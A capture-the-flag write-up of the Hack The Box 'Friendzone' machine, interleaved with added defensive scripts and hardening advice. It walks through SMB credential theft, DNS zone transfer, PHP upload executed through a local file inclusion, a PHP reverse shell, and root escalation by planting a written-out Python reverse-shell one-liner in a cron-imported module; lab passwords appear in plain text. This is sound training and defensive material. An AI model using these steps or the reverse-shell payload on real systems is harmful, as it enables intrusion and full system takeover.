HTB Friendzone #22

Nmap Result:

Not shown: 993 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_http-title: 404 Not Found
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2022-02-22T05:02:00+02:00
| smb2-time: 
|   date: 2022-02-22T03:02:00
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

21 enum:

53: zone?

80 enum:

SMB Enum:

smbmap -H 10.129.1.225

Looks like we can read from general and Development.

smbmap -H 10.129.1.225 -R --depth 5

Running this recurses into those shares (down to 5 levels) and lists the files in them.

smbclient //10.129.1.225/general

and download the file with: get creds.txt

creds.txt content

admin:WORKWORKHhallelujah@#

----

HTTPs

/js/js

This page is executing PHP code.

---

Let's try some zone transfer!

dig axfr @10.129.1.225 friendzone.red > zonetransfer

Now we've got more hosts. Next, do the same for the other domain:

dig axfr @10.129.1.225 friendzoneportal.red >> zonetransfer

cat zonetransfer| grep friendzone | grep IN | awk '{print $1}'| sed 's/\.$//g'|sort -u

Command Explanation:

  • grep keeps only the lines containing both "friendzone" and "IN" (the class field of a DNS record)

  • awk '{print $1}' prints the first whitespace-separated field, i.e. the text up to the first space (the hostname)

  • sed 's/\.$//g' replaces the trailing period with nothing: the first part between the slashes is the pattern you want to replace, the second part is what to replace it with (here empty)

  • Syntax: sed 's/value1/value2/g'

Now we've got more hosts.

Used gedit to format the hostnames as https://hostname

Now use aquatone to see which hosts have actual content in a timely manner.

To use aquatone, the text file needs to be in the same directory as aquatone: /opt/aquatone
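The dig/grep/awk/sed pipeline above, done as one awk pass, plus the https:// prefixing that was done by hand in gedit. This is an added example and not part of the original write-up: the zone data it works on is constructed (RFC 5737 documentation addresses, only hostnames that appear in these notes), and the functions extract_hosts, to_urls and make_sample are names chosen here. Filtering on the class field ($3 == "IN") instead of grepping for "IN" anywhere means the dig banner line, which also contains the zone name, can never slip into the host list.

```shell
#!/bin/sh
# Added example (not from the write-up): turn saved `dig axfr` output into a
# de-duplicated list of hostnames, then into https:// URLs for aquatone.
# One awk pass keeps only records whose class field is "IN" and whose owner
# name contains the zone keyword, then strips the FQDN's trailing dot.

extract_hosts() {
    # $1: file holding dig axfr output, $2: keyword the owner name must contain
    awk -v zone="$2" '
        $3 == "IN" && index($1, zone) {
            sub(/\.$/, "", $1)   # drop the trailing dot of the FQDN
            print $1
        }' "$1" | sort -u
}

to_urls() {
    # read hostnames on stdin, write one https:// URL per line
    sed 's#^#https://#'
}

make_sample() {
    # writes a CONSTRUCTED zone transfer to $1; the IPs are documentation
    # addresses (RFC 5737), not the lab host, and only hostnames that appear
    # in the notes above are used
    cat > "$1" <<'EOF'
; <<>> DiG 9.16.1-Ubuntu <<>> axfr @192.0.2.10 friendzone.red
;; global options: +cmd
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                 604800  IN  AAAA  ::1
friendzone.red.                 604800  IN  NS    localhost.
friendzone.red.                 604800  IN  A     192.0.2.10
administrator1.friendzone.red.  604800  IN  A     192.0.2.10
uploads.friendzone.red.         604800  IN  A     192.0.2.10
uploads.friendzone.red.         604800  IN  A     192.0.2.10
;; Query time: 1 msec
EOF
}

# usage: make_sample zone.txt; extract_hosts zone.txt friendzone | to_urls > hosts.txt
```

From the defender's side, the fact that the transfer succeeded at all is the finding: a BIND zone should carry an allow-transfer statement listing only its secondaries, so an arbitrary client asking for AXFR gets a refusal instead of the full host list.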

Interesting urls:

https://administrator1.friendzone.red : login portal
https://admin.friendzoneportal.red : login portal
https://uploads.friendzone.red

We can also see the analysis by opening the output HTML in Firefox:

uploads.friendzone.red

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

We could try to upload a file to the Development share through SMB and execute it through the LFI here?

Test PHP:

<?php
echo "Gorigorisensei Hacking your System.";
?>

Now it's uploaded to Development.

Visiting the following link, we confirm that it's working.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test
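What the include above looks like from the server's side, as an added example that is not part of the original write-up: a small log check that flags dashboard.php requests whose pagename parameter carries a path (a slash, a dot-dot, or their URL-encoded forms) instead of a bare page name such as timestamp. The access log lines are constructed for the demo (Apache combined format, documentation IPs), and the function names flag_lfi and make_log are chosen here.

```shell
#!/bin/sh
# Added example (not from the write-up): scan an Apache access log for
# dashboard.php requests whose pagename parameter carries a path rather than
# a bare page name. The log lines below are CONSTRUCTED for the demo; only
# the URL shape mirrors the notes above.

flag_lfi() {
    # $1: access log in Apache combined format
    # prints "<client-ip> <pagename-value>" for each suspicious request
    grep 'pagename=' "$1" | while IFS= read -r line; do
        client=${line%% *}    # first field of the combined format is the client IP
        value=$(printf '%s\n' "$line" | sed -n 's/.*[?&]pagename=\([^ &"]*\).*/\1/p')
        case "$value" in
            */*|*..*|*%2[fF]*|*%2[eE]*)   # slash, dot-dot, or their URL-encoded forms
                printf '%s %s\n' "$client" "$value" ;;
        esac
    done
}

make_log() {
    # writes four CONSTRUCTED log lines to $1: two normal page loads, one
    # absolute path, one URL-encoded absolute path
    cat > "$1" <<'EOF'
192.0.2.50 - - [22/Feb/2022:05:02:00 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.50 - - [22/Feb/2022:05:03:10 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/test HTTP/1.1" 200 98 "-" "Mozilla/5.0"
192.0.2.51 - - [22/Feb/2022:05:04:00 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=%2Fetc%2FDevelopment%2Ftest HTTP/1.1" 200 98 "-" "curl/7.68.0"
192.0.2.52 - - [22/Feb/2022:05:05:00 +0200] "GET /dashboard.php?image_id=a.jpg&pagename=login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
}

# usage: make_log access.log; flag_lfi access.log
```

Two things would have stopped this chain: the page parameter should be matched against a fixed list of allowed page names before anything is included, and the Development share should not be writable by an anonymous SMB user, because a file that an unauthenticated client can write into a path the web server will include is code execution waiting to happen.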

Adjusted the script to use the PHP reverse shell from:

https://github.com/pentestmonkey/php-reverse-shell

Now we have a shell.

User credential found:

Agpyu12!0.213$

switched user.

root owned file found

Can't edit it though...

This is just running the os module as a cron job.

Let's do LinPeas.

Writable file found, and it's the os module file! If we edit it, it will be run by the reporter Python script!
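The check that finds this misconfiguration, as an added example that is not part of the original write-up: a root cron job that imports a Python module runs whatever that module file contains, so any *.py on the interpreter's import path that a non-root user can write is a privilege escalation path. The fake module tree is constructed in a temporary directory so the check runs anywhere; the function names find_writable_modules and make_tree are chosen here.

```shell
#!/bin/sh
# Added example (not from the write-up): find Python module files that any
# user can modify. A root cron job that imports such a module executes the
# file's contents, which is exactly the writable-os-module case above.
# The directory tree is CONSTRUCTED in a temp dir so the check runs anywhere.

find_writable_modules() {
    # $1: directory to scan. For a real check, run it over each directory in
    #     the output of: python3 -c 'import sys; print(sys.path)'
    # prints the path of every *.py that is world-writable, sorted
    find "$1" -type f -name '*.py' -perm -002 | sort
}

make_tree() {
    # builds a fake library directory under $1 with one bad and one good module
    mkdir -p "$1/lib"
    printf 'import sys\n' > "$1/lib/os.py"
    printf 'import sys\n' > "$1/lib/good.py"
    chmod 666 "$1/lib/os.py"      # the bad case: anyone may edit it
    chmod 644 "$1/lib/good.py"    # the normal case: only the owner may write
}

# usage: find_writable_modules /usr/lib/python3.6
```

The same idea applies to the cron job itself: a script run from root's crontab should be owned by root and writable only by root, and every directory it imports from should be too, otherwise the cron entry is the privilege and the file permissions are the lock.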

Replaced the content with the reverse shell (removed the os function).

This wasn't working, so I used triple quotes around the code, but this didn't work either.

I used this instead:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I'm definitely getting better at vi... but still not great at it:

vim commands I used today:

dd - erase a line

u - undo

i - insert
